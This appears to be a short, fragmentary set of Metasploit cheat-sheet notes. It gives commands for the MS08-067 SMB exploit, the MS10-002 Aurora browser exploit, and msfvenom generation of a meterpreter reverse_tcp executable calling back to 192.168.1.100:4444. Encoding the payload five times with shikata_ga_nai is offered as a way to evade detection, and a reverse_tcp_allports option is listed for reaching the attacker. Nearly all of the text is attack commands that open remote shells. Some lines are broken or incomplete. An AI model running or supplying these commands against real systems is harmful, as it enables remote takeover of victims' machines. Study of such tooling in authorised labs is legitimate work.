‘use windows/smb/ms08_067_netapi’
‘<set RHOST
‘set payload/windows/shell_reverse_tcp


msfvenom -
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o 
shell.exe 
Use encoding: -e x86/shikata_ga_nai -i 5 to encode payload 5 times. 

msfconsole
1.	2. Load the Aurora exploit module:
use exploit/windows/browser/ms10_002_aurora
2.	3. Set required options:
set SRVHOST <Your Kali IP>
set SRVPORT 8080
set URIPATH /
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <Your Kali IP>
•	Optionally, set AutoRunScript or PrependMigrate:
set AutoRunScript migrate -f
OR
set PrependMigrate true


browser -
set LPORT 80
•	Use All Ports Payload
The reverse_tcp_allports payload attempts to connect back to the attack machine on all ports until one succeeds:
 try command:
 
set payload windows/shell/reverse_tcp_allports
